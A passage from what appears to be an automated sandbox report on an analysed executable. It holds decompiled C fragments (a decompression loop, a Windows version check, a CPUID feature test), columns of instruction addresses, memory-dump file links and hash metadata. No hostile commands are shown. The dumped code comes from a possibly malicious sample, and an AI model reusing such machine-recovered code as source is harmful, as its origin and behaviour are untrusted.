																		if(_t234 > _v1304) {
																			L116:
																			_push(_t195);
																			goto L117;
																		}
																		memset( &_v1280 + _v1312 * 4, 0, _t162 << 2);
																		_t256 =  &(_t256[3]);
																		_t129 = _v1316;
																		goto L109;
																	} else {
																		goto L85;
																	}
																	do {
																		L85:
																		_t225 = _t225 + 0xffffffff;
																		__eflags = _t225;
																		 *0xf0b5a0 = _t225;
																		asm("adc dword [0xf0b5a4], 0xffffffff");
																		if(__eflags < 0) {
																			L89:
																			_t165 = E00ECA1D6(_t136, _t225);
																			_t225 =  *0xf0b5a0; // 0x116
																			L90:
																			__eflags = _t165 - 0xffffffff;
																			if(_t165 == 0xffffffff) {
																				__eflags = _t246;
																				if(_t246 < 0) {
																					goto L126;
																				}
																				L94:
																				_t195 = _v1320;
																				goto L95;
																			}
																			goto L91;
																		}
																		if(__eflags > 0) {
																			L88:
																			_t166 =  *0xf0b598; // 0x31dc72d
																			 *0xf0b598 =  &(_t166[1]);
																			_t165 =  *_t166 & 0x000000ff;
																			goto L90;
																		}
																		__eflags = _t225 - _t229;
																		if(_t225 < _t229) {
																			goto L89;
																		}
																		goto L88;
																		L91:
																		_t210 = _t246;
																		_t246 = _t246 + 8;
																		_t136 = _t165 << _t210;
																		_t253 = _t253 | _t165 << _t210;
																		__eflags = _t246 - 3;
																	} while (_t246 < 3);
																	goto L94;
																}
																__eflags = _t246 - 2;
																if(_t246 >= 2) {
																	L81:
																	_t169 = _t253 & 0x00000003;
																	_t253 = _t253 >> 2;
																	_t170 = _t169 + 3;
																	_t246 = _t246 - 2;
																	_t239 = _v1312 + _t170;
																	_v1316 = _t239;
																	__eflags = _t239 - _v1304;
																	if(_t239 > _v1304) {
																		goto L116;
																	}
																	memset( &_v1280 + _v1312 * 4, _v1296, _t170 << 2);
																	_t256 =  &(_t256[3]);
																	_t129 = _v1316;
																	_t229 = 0;
																	goto L110;
																} else {
																	goto L71;
																}
																do {
																	L71:
																	_t225 = _t225 + 0xffffffff;
																	__eflags = _t225;
																	 *0xf0b5a0 = _t225;
																	asm("adc dword [0xf0b5a4], 0xffffffff");
																	if(__eflags < 0) {
																		L75:
																		_t173 = E00ECA1D6(_t136, _t225);
																		_t225 =  *0xf0b5a0; // 0x116
																		L76:
																		__eflags = _t173 - 0xffffffff;
																		if(_t173 == 0xffffffff) {
																			__eflags = _t246;
																			if(_t246 < 0) {
																				goto L126;
																			}
																			L80:
																			_t195 = _v1320;
																			goto L81;
																		}
																		goto L77;
																	}
																	if(__eflags > 0) {
																		L74:
																		_t174 =  *0xf0b598; // 0x31dc72d
																		 *0xf0b598 =  &(_t174[1]);
																		_t173 =  *_t174 & 0x000000ff;
																		goto L76;
																	}
																	__eflags = _t225 - _t229;
																	if(_t225 < _t229) {
																		goto L75;
																	}
																	goto L74;
																	L77:
																	_t215 = _t246;
																	_t246 = _t246 + 8;
																	_t136 = _t173 << _t215;
																	_t253 = _t253 | _t173 << _t215;
																	__eflags = _t246 - 2;
																} while (_t246 < 2);
																goto L80;
															}
															_t217 = _v1312;
															_v1296 = _t136;
															 *(_t256 + 0x38 + _t217 * 4) = _t136;
															_t129 = _t217 + 1;
															goto L110;
														}
														_t129 = _t130 << _t246;
														_t253 = _t253 | _t130 << _t246;
														_t246 = _t246 + 8;
														__eflags = _t246;
														continue;
													}
													if(__eflags > 0) {
														L60:
														_t144 =  *0xf0b598; // 0x31dc72d
														 *0xf0b598 =  &(_t144[1]);
														_t130 =  *_t144 & 0x000000ff;
														goto L62;
													}
													__eflags = _t225 - _t229;
													if(_t225 < _t229) {
														goto L61;
													}
													goto L60;
												}
												goto L67;
												L110:
												_t201 = _v1320;
												_v1312 = _t129;
												__eflags = _t129 - _v1304;
											} while (_t129 < _v1304);
											E00ECAB49(_t201);
											 *0xf0c814 = _t253;
											_t254 = _v1304;
											 *0xf0c818 = _t246;
											_v1312 = 9;
											_t150 = E00ECA6AE( &_v1284, _t254, 0x101,  *0xf0c804,  *0xf0c808,  &_v1324,  &_v1312);
											__eflags = _v1340;
											_t247 = _t150;
											if(_v1340 == 0) {
												_t247 = _t182;
											}
											__eflags = _t247;
											if(_t247 == 0) {
												_v1300 = 6;
												_t155 = E00ECA6AE( &_v1280 + _t254 * 4, _v1292, _t229, 0xee7fd8,  *0xf0c80c,  &_v1288,  &_v1300);
												_t100 = _t155 - 1; // -1
												asm("sbb esi, esi");
												_t247 =  ~_t100 & _t155;
												__eflags = _v1328;
												if(_v1328 == 0) {
													__eflags = _t254 - 0x101;
													if(_t254 > 0x101) {
														_t247 = _t182;
													}
												}
												__eflags = _t247;
												if(_t247 == 0) {
													_push(_v1300);
													_t229 = _v1288;
													_push(_v1308);
													_push(_t229);
													_push(_v1320);
													_t182 = E00ECAE33();
													goto L126;
												} else {
													__eflags = _t247 - _t182;
													if(_t247 == _t182) {
														E00ECAB49(_v1288);
													}
													goto L131;
												}
											} else {
												__eflags = _t247 - _t182;
												if(_t247 != _t182) {
													goto L133;
												}
												_push(_v1320);
												goto L132;
											}
										} else {
											if(_t228 == _t182) {
												E00ECAB49(_v1320);
											}
											return _t228;
										}
									}
									L36:
									_t123 =  *(0xee8058 + _t187 * 4);
									_t187 = _t187 + 1;
									 *((intOrPtr*)(_t256 + 0x38 + _t123 * 4)) = 0;
									goto L37;
								}
							} else {
								goto L23;
							}
							while(1) {
								L23:
								_t221 = _t221 + 0xffffffff;
								_t260 = _t221;
								 *0xf0b5a0 = _t221;
								asm("adc dword [0xf0b5a4], 0xffffffff");
								if(_t260 < 0 || _t260 <= 0 && _t221 < 0) {
									_t179 = E00ECA1D6(_t114, _t221);
									_t221 =  *0xf0b5a0; // 0x116
									_t227 =  *0xf0b598; // 0x31dc72d
								} else {
									_t179 =  *_t227 & 0x000000ff;
									_t227 =  &(_t227[1]);
									 *0xf0b598 = _t227;
								}
								if(_t179 == 0xffffffff) {
									break;
								}
								_t218 = _t245;
								_t245 = _t245 + 8;
								_t114 = _t179 << _t218;
								_t252 = _t252 | _t179 << _t218;
								if(_t245 < 4) {
									continue;
								}
								L32:
								_t186 = _v1292;
								goto L33;
							}
							__eflags = _t245;
							if(_t245 < 0) {
								goto L11;
							}
							goto L32;
						}
						_t251 = _t251 | _t114;
						_t244 = _t244 + 8;
						__eflags = _t244;
						continue;
					}
					if(__eflags > 0) {
						L15:
						_t114 =  *_t227 & 0x000000ff;
						_t227 =  &(_t227[1]);
						 *0xf0b598 = _t227;
						goto L17;
					}
					__eflags = _t221;
					if(_t221 < 0) {
						goto L16;
					}
					goto L15;
				}
				goto L22;
			}










































































                                                                                                                0x00ecb2e6
                                                                                                                0x00ecb2ea
                                                                                                                0x00ecb2ee
                                                                                                                0x00ecb2f3
                                                                                                                0x00ecb2f9
                                                                                                                0x00ecb2fc
                                                                                                                0x00ecb302
                                                                                                                0x00ecb308
                                                                                                                0x00ecb353
                                                                                                                0x00ecb310
                                                                                                                0x00ecb310
                                                                                                                0x00ecb313
                                                                                                                0x00ecb319
                                                                                                                0x00ecb320
                                                                                                                0x00ecb334
                                                                                                                0x00ecb334
                                                                                                                0x00ecb339
                                                                                                                0x00ecb33f
                                                                                                                0x00ecb345
                                                                                                                0x00ecb345
                                                                                                                0x00ecb348
                                                                                                                0x00ecb36e
                                                                                                                0x00ecb370
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb372
                                                                                                                0x00ecb374
                                                                                                                0x00ecb841
                                                                                                                0x00000000
                                                                                                                0x00ecb34a
                                                                                                                0x00ecb34c
                                                                                                                0x00ecb34e
                                                                                                                0x00ecb350
                                                                                                                0x00ecb350
                                                                                                                0x00000000
                                                                                                                0x00ecb350
                                                                                                                0x00ecb348
                                                                                                                0x00ecb322
                                                                                                                0x00ecb328
                                                                                                                0x00ecb328
                                                                                                                0x00ecb32b
                                                                                                                0x00ecb32c
                                                                                                                0x00000000
                                                                                                                0x00ecb32c
                                                                                                                0x00ecb324
                                                                                                                0x00ecb326
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb326
                                                                                                                0x00ecb35a
                                                                                                                0x00ecb360
                                                                                                                0x00ecb365
                                                                                                                0x00ecb368
                                                                                                                0x00ecb3bd
                                                                                                                0x00ecb37a
                                                                                                                0x00ecb37a
                                                                                                                0x00ecb37d
                                                                                                                0x00ecb383
                                                                                                                0x00ecb38a
                                                                                                                0x00ecb39e
                                                                                                                0x00ecb39e
                                                                                                                0x00ecb3a3
                                                                                                                0x00ecb3a9
                                                                                                                0x00ecb3af
                                                                                                                0x00ecb3af
                                                                                                                0x00ecb3b2
                                                                                                                0x00ecb3c4
                                                                                                                0x00ecb3c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb3c8
                                                                                                                0x00ecb3ca
                                                                                                                0x00ecb3d0
                                                                                                                0x00ecb3d3
                                                                                                                0x00ecb3d4
                                                                                                                0x00ecb3db
                                                                                                                0x00ecb433
                                                                                                                0x00ecb435
                                                                                                                0x00ecb43b
                                                                                                                0x00ecb43e
                                                                                                                0x00ecb449
                                                                                                                0x00ecb44d
                                                                                                                0x00ecb8eb
                                                                                                                0x00000000
                                                                                                                0x00ecb45c
                                                                                                                0x00ecb45c
                                                                                                                0x00ecb45e
                                                                                                                0x00ecb464
                                                                                                                0x00000000
                                                                                                                0x00ecb50a
                                                                                                                0x00ecb50a
                                                                                                                0x00ecb50a
                                                                                                                0x00ecb50a
                                                                                                                0x00ecb50d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb4c7
                                                                                                                0x00ecb4c7
                                                                                                                0x00ecb4ca
                                                                                                                0x00ecb4d0
                                                                                                                0x00ecb4d7
                                                                                                                0x00ecb4eb
                                                                                                                0x00ecb4eb
                                                                                                                0x00ecb4f0
                                                                                                                0x00ecb4f6
                                                                                                                0x00ecb4fc
                                                                                                                0x00ecb4fc
                                                                                                                0x00ecb4ff
                                                                                                                0x00ecb511
                                                                                                                0x00ecb513
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb513
                                                                                                                0x00ecb503
                                                                                                                0x00ecb505
                                                                                                                0x00ecb507
                                                                                                                0x00ecb507
                                                                                                                0x00000000
                                                                                                                0x00ecb507
                                                                                                                0x00ecb4d9
                                                                                                                0x00ecb4df
                                                                                                                0x00ecb4df
                                                                                                                0x00ecb4e2
                                                                                                                0x00ecb4e3
                                                                                                                0x00000000
                                                                                                                0x00ecb4e3
                                                                                                                0x00ecb4db
                                                                                                                0x00ecb4dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb4dd
                                                                                                                0x00ecb519
                                                                                                                0x00ecb51f
                                                                                                                0x00ecb522
                                                                                                                0x00ecb525
                                                                                                                0x00ecb528
                                                                                                                0x00ecb52f
                                                                                                                0x00ecb537
                                                                                                                0x00ecb538
                                                                                                                0x00ecb53c
                                                                                                                0x00ecb53c
                                                                                                                0x00ecb476
                                                                                                                0x00ecb479
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb47f
                                                                                                                0x00ecb49f
                                                                                                                0x00ecb4a1
                                                                                                                0x00ecb4a7
                                                                                                                0x00ecb4a9
                                                                                                                0x00ecb4a9
                                                                                                                0x00ecb4ad
                                                                                                                0x00ecb54d
                                                                                                                0x00ecb558
                                                                                                                0x00ecb55c
                                                                                                                0x00ecb55e
                                                                                                                0x00ecb562
                                                                                                                0x00ecb568
                                                                                                                0x00ecb56c
                                                                                                                0x00ecb570
                                                                                                                0x00ecb5b5
                                                                                                                0x00ecb5b5
                                                                                                                0x00ecb5b5
                                                                                                                0x00ecb5b5
                                                                                                                0x00ecb5b9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb572
                                                                                                                0x00ecb572
                                                                                                                0x00ecb575
                                                                                                                0x00ecb57b
                                                                                                                0x00ecb582
                                                                                                                0x00ecb59c
                                                                                                                0x00ecb59c
                                                                                                                0x00ecb5a1
                                                                                                                0x00ecb5a7
                                                                                                                0x00ecb5a7
                                                                                                                0x00ecb5aa
                                                                                                                0x00ecb5bd
                                                                                                                0x00ecb5bf
                                                                                                                0x00ecb8bd
                                                                                                                0x00ecb8bd
                                                                                                                0x00ecb8c1
                                                                                                                0x00ecb8c3
                                                                                                                0x00ecb8c6
                                                                                                                0x00ecb8c6
                                                                                                                0x00ecb8cb
                                                                                                                0x00ecb8cd
                                                                                                                0x00ecb8d3
                                                                                                                0x00ecb83c
                                                                                                                0x00ecb83c
                                                                                                                0x00ecb83c
                                                                                                                0x00000000
                                                                                                                0x00ecb8cd
                                                                                                                0x00ecb5c5
                                                                                                                0x00ecb5cd
                                                                                                                0x00ecb5cf
                                                                                                                0x00ecb5d4
                                                                                                                0x00ecb5d6
                                                                                                                0x00ecb5d8
                                                                                                                0x00ecb5dc
                                                                                                                0x00ecb5e1
                                                                                                                0x00ecb5e4
                                                                                                                0x00ecb5fa
                                                                                                                0x00ecb69b
                                                                                                                0x00ecb69e
                                                                                                                0x00ecb77e
                                                                                                                0x00ecb77e
                                                                                                                0x00ecb781
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb73b
                                                                                                                0x00ecb73b
                                                                                                                0x00ecb73e
                                                                                                                0x00ecb744
                                                                                                                0x00ecb74b
                                                                                                                0x00ecb765
                                                                                                                0x00ecb765
                                                                                                                0x00ecb76a
                                                                                                                0x00ecb770
                                                                                                                0x00ecb770
                                                                                                                0x00ecb773
                                                                                                                0x00ecb785
                                                                                                                0x00ecb787
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb78d
                                                                                                                0x00ecb78d
                                                                                                                0x00ecb793
                                                                                                                0x00ecb796
                                                                                                                0x00ecb799
                                                                                                                0x00ecb79c
                                                                                                                0x00ecb79f
                                                                                                                0x00ecb7a2
                                                                                                                0x00ecb7a6
                                                                                                                0x00ecb7aa
                                                                                                                0x00ecb8d9
                                                                                                                0x00ecb8db
                                                                                                                0x00ecb8df
                                                                                                                0x00ecb8e0
                                                                                                                0x00ecb8e0
                                                                                                                0x00ecb8e5
                                                                                                                0x00000000
                                                                                                                0x00ecb8e5
                                                                                                                0x00ecb7b7
                                                                                                                0x00ecb7b9
                                                                                                                0x00ecb7b9
                                                                                                                0x00ecb7bb
                                                                                                                0x00ecb7bf
                                                                                                                0x00ecb7bf
                                                                                                                0x00ecb7bf
                                                                                                                0x00ecb7c1
                                                                                                                0x00000000
                                                                                                                0x00ecb7c1
                                                                                                                0x00ecb777
                                                                                                                0x00ecb779
                                                                                                                0x00ecb77b
                                                                                                                0x00ecb77b
                                                                                                                0x00000000
                                                                                                                0x00ecb77b
                                                                                                                0x00ecb74d
                                                                                                                0x00ecb753
                                                                                                                0x00ecb753
                                                                                                                0x00ecb75c
                                                                                                                0x00ecb761
                                                                                                                0x00000000
                                                                                                                0x00ecb761
                                                                                                                0x00ecb74f
                                                                                                                0x00ecb751
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb751
                                                                                                                0x00000000
                                                                                                                0x00ecb783
                                                                                                                0x00ecb6a4
                                                                                                                0x00ecb6a7
                                                                                                                0x00ecb6ff
                                                                                                                0x00ecb705
                                                                                                                0x00ecb708
                                                                                                                0x00ecb70b
                                                                                                                0x00ecb70e
                                                                                                                0x00ecb711
                                                                                                                0x00ecb713
                                                                                                                0x00ecb717
                                                                                                                0x00ecb71b
                                                                                                                0x00ecb83b
                                                                                                                0x00ecb83b
                                                                                                                0x00000000
                                                                                                                0x00ecb83b
                                                                                                                0x00ecb730
                                                                                                                0x00ecb730
                                                                                                                0x00ecb732
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb6a9
                                                                                                                0x00ecb6a9
                                                                                                                0x00ecb6a9
                                                                                                                0x00ecb6a9
                                                                                                                0x00ecb6ac
                                                                                                                0x00ecb6b2
                                                                                                                0x00ecb6b9
                                                                                                                0x00ecb6d3
                                                                                                                0x00ecb6d3
                                                                                                                0x00ecb6d8
                                                                                                                0x00ecb6de
                                                                                                                0x00ecb6de
                                                                                                                0x00ecb6e1
                                                                                                                0x00ecb6f3
                                                                                                                0x00ecb6f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb6fb
                                                                                                                0x00ecb6fb
                                                                                                                0x00000000
                                                                                                                0x00ecb6fb
                                                                                                                0x00000000
                                                                                                                0x00ecb6e1
                                                                                                                0x00ecb6bb
                                                                                                                0x00ecb6c1
                                                                                                                0x00ecb6c1
                                                                                                                0x00ecb6ca
                                                                                                                0x00ecb6cf
                                                                                                                0x00000000
                                                                                                                0x00ecb6cf
                                                                                                                0x00ecb6bd
                                                                                                                0x00ecb6bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb6e3
                                                                                                                0x00ecb6e3
                                                                                                                0x00ecb6e5
                                                                                                                0x00ecb6e8
                                                                                                                0x00ecb6ea
                                                                                                                0x00ecb6ec
                                                                                                                0x00ecb6ec
                                                                                                                0x00000000
                                                                                                                0x00ecb6f1
                                                                                                                0x00ecb600
                                                                                                                0x00ecb603
                                                                                                                0x00ecb65b
                                                                                                                0x00ecb661
                                                                                                                0x00ecb664
                                                                                                                0x00ecb667
                                                                                                                0x00ecb66a
                                                                                                                0x00ecb66d
                                                                                                                0x00ecb66f
                                                                                                                0x00ecb673
                                                                                                                0x00ecb677
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb68e
                                                                                                                0x00ecb68e
                                                                                                                0x00ecb690
                                                                                                                0x00ecb694
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb605
                                                                                                                0x00ecb605
                                                                                                                0x00ecb605
                                                                                                                0x00ecb605
                                                                                                                0x00ecb608
                                                                                                                0x00ecb60e
                                                                                                                0x00ecb615
                                                                                                                0x00ecb62f
                                                                                                                0x00ecb62f
                                                                                                                0x00ecb634
                                                                                                                0x00ecb63a
                                                                                                                0x00ecb63a
                                                                                                                0x00ecb63d
                                                                                                                0x00ecb64f
                                                                                                                0x00ecb651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb657
                                                                                                                0x00ecb657
                                                                                                                0x00000000
                                                                                                                0x00ecb657
                                                                                                                0x00000000
                                                                                                                0x00ecb63d
                                                                                                                0x00ecb617
                                                                                                                0x00ecb61d
                                                                                                                0x00ecb61d
                                                                                                                0x00ecb626
                                                                                                                0x00ecb62b
                                                                                                                0x00000000
                                                                                                                0x00ecb62b
                                                                                                                0x00ecb619
                                                                                                                0x00ecb61b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb63f
                                                                                                                0x00ecb63f
                                                                                                                0x00ecb641
                                                                                                                0x00ecb644
                                                                                                                0x00ecb646
                                                                                                                0x00ecb648
                                                                                                                0x00ecb648
                                                                                                                0x00000000
                                                                                                                0x00ecb64d
                                                                                                                0x00ecb5e6
                                                                                                                0x00ecb5ea
                                                                                                                0x00ecb5ee
                                                                                                                0x00ecb5f4
                                                                                                                0x00000000
                                                                                                                0x00ecb5f4
                                                                                                                0x00ecb5ae
                                                                                                                0x00ecb5b0
                                                                                                                0x00ecb5b2
                                                                                                                0x00ecb5b2
                                                                                                                0x00000000
                                                                                                                0x00ecb5b2
                                                                                                                0x00ecb584
                                                                                                                0x00ecb58a
                                                                                                                0x00ecb58a
                                                                                                                0x00ecb593
                                                                                                                0x00ecb598
                                                                                                                0x00000000
                                                                                                                0x00ecb598
                                                                                                                0x00ecb586
                                                                                                                0x00ecb588
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb588
                                                                                                                0x00000000
                                                                                                                0x00ecb7c5
                                                                                                                0x00ecb7c5
                                                                                                                0x00ecb7c9
                                                                                                                0x00ecb7cd
                                                                                                                0x00ecb7cd
                                                                                                                0x00ecb7d8
                                                                                                                0x00ecb7e1
                                                                                                                0x00ecb7e7
                                                                                                                0x00ecb7f0
                                                                                                                0x00ecb801
                                                                                                                0x00ecb816
                                                                                                                0x00ecb81b
                                                                                                                0x00ecb820
                                                                                                                0x00ecb822
                                                                                                                0x00ecb824
                                                                                                                0x00ecb824
                                                                                                                0x00ecb826
                                                                                                                0x00ecb828
                                                                                                                0x00ecb84c
                                                                                                                0x00ecb872
                                                                                                                0x00ecb877
                                                                                                                0x00ecb87c
                                                                                                                0x00ecb87e
                                                                                                                0x00ecb880
                                                                                                                0x00ecb885
                                                                                                                0x00ecb887
                                                                                                                0x00ecb88d
                                                                                                                0x00ecb88f
                                                                                                                0x00ecb88f
                                                                                                                0x00ecb88d
                                                                                                                0x00ecb891
                                                                                                                0x00ecb893
                                                                                                                0x00ecb8a4
                                                                                                                0x00ecb8a8
                                                                                                                0x00ecb8ac
                                                                                                                0x00ecb8b4
                                                                                                                0x00ecb8b5
                                                                                                                0x00ecb8bb
                                                                                                                0x00000000
                                                                                                                0x00ecb895
                                                                                                                0x00ecb895
                                                                                                                0x00ecb897
                                                                                                                0x00ecb89d
                                                                                                                0x00ecb89d
                                                                                                                0x00000000
                                                                                                                0x00ecb897
                                                                                                                0x00ecb82a
                                                                                                                0x00ecb82a
                                                                                                                0x00ecb82c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb832
                                                                                                                0x00000000
                                                                                                                0x00ecb832
                                                                                                                0x00ecb4b3
                                                                                                                0x00ecb4b5
                                                                                                                0x00ecb4bb
                                                                                                                0x00ecb4bb
                                                                                                                0x00000000
                                                                                                                0x00ecb4c0
                                                                                                                0x00ecb4ad
                                                                                                                0x00ecb46a
                                                                                                                0x00ecb46a
                                                                                                                0x00ecb471
                                                                                                                0x00ecb472
                                                                                                                0x00000000
                                                                                                                0x00ecb472
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb3dd
                                                                                                                0x00ecb3dd
                                                                                                                0x00ecb3dd
                                                                                                                0x00ecb3dd
                                                                                                                0x00ecb3e0
                                                                                                                0x00ecb3e6
                                                                                                                0x00ecb3ed
                                                                                                                0x00ecb401
                                                                                                                0x00ecb406
                                                                                                                0x00ecb40c
                                                                                                                0x00ecb3f5
                                                                                                                0x00ecb3f5
                                                                                                                0x00ecb3f8
                                                                                                                0x00ecb3f9
                                                                                                                0x00ecb3f9
                                                                                                                0x00ecb415
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb417
                                                                                                                0x00ecb419
                                                                                                                0x00ecb41c
                                                                                                                0x00ecb41e
                                                                                                                0x00ecb423
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb42f
                                                                                                                0x00ecb42f
                                                                                                                0x00000000
                                                                                                                0x00ecb42f
                                                                                                                0x00ecb427
                                                                                                                0x00ecb429
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb429
                                                                                                                0x00ecb3b8
                                                                                                                0x00ecb3ba
                                                                                                                0x00ecb3ba
                                                                                                                0x00000000
                                                                                                                0x00ecb3ba
                                                                                                                0x00ecb38c
                                                                                                                0x00ecb392
                                                                                                                0x00ecb392
                                                                                                                0x00ecb395
                                                                                                                0x00ecb396
                                                                                                                0x00000000
                                                                                                                0x00ecb396
                                                                                                                0x00ecb38e
                                                                                                                0x00ecb390
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecb390
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: SSSS.exe
                                                                                                                • API String ID: 0-2379260107
                                                                                                                • Opcode ID: a7c8e9741f977c865d1e894d730f91ff5037fa4bd14db784eade64e72a766e57
                                                                                                                • Instruction ID: 9723032a11b634a8e4c7e45fa3b1aca838f9017f2e6d0a6a8b186fd2b77c9c28
                                                                                                                • Opcode Fuzzy Hash: a7c8e9741f977c865d1e894d730f91ff5037fa4bd14db784eade64e72a766e57
                                                                                                                • Instruction Fuzzy Hash: C00206729043598FC714DF18CE82A6AB7E5BB84324F19172DE8A5B72A0E7729C079B41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC2B26, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC2B26() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xef1000; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xef3d80; // 0xa
					_t13 =  *0xef3d84; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xef1000 = _t12;
					 *0xef3d80 = _t6;
					 *0xef3d84 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                                                                                                                0x00ec2b29
                                                                                                                0x00ec2b38
                                                                                                                0x00ec2b76
                                                                                                                0x00ec2b7b
                                                                                                                0x00ec2b3a
                                                                                                                0x00ec2b40
                                                                                                                0x00ec2b4b
                                                                                                                0x00ec2b51
                                                                                                                0x00ec2b57
                                                                                                                0x00ec2b5d
                                                                                                                0x00ec2b63
                                                                                                                0x00ec2b69
                                                                                                                0x00ec2b6e
                                                                                                                0x00ec2b6e
                                                                                                                0x00ec2b84
                                                                                                                0x00000000
                                                                                                                0x00ec2b86
                                                                                                                0x00000000
                                                                                                                0x00ec2b89

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00EC2B4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                • Opcode ID: 90247cfebead46e0af119127c465b6007ebc1d9968201db8f27e9527972ec4ba
                                                                                                                • Instruction ID: 9a6218fff1c623c4c424c8d27d03ad7cc94412594b6fd3347396cad81502d12d
                                                                                                                • Opcode Fuzzy Hash: 90247cfebead46e0af119127c465b6007ebc1d9968201db8f27e9527972ec4ba
                                                                                                                • Instruction Fuzzy Hash: 3FF01DB490020D8FCB28CF29ED41AE573B5F7D4724F10429DDA1963794D7726E89CE91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC6951, Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00EC6951(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _t29;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr* _t44;
				signed int _t46;
				intOrPtr* _t47;

				_t40 = __edx;
				_t44 =  &_v20;
				asm("cpuid");
				 *_t44 = 0x80000000;
				 *((intOrPtr*)(_t44 + 4)) = _t36;
				 *((intOrPtr*)(_t44 + 8)) = 0;
				 *((intOrPtr*)(_t44 + 0xc)) = __edx;
				_t46 = _v20 & 0x7fffffff;
				_t29 = 7;
				if(_t46 < 0x80000000) {
					L4:
					if(_t46 < 1) {
						L13:
						return 0;
					}
					_t47 =  &_v20;
					asm("cpuid");
					 *_t47 = 1;
					 *((intOrPtr*)(_t47 + 4)) = _t36;
					 *((intOrPtr*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0xc)) = _t40;
					if((_v12 & 0x00080000) == 0) {
						if((_v12 & 0x00000200) == 0) {
							if((_v8 & 0x04000000) == 0) {
								if((_v8 & 0x02000000) == 0) {
									goto L13;
								}
								return 1;
							}
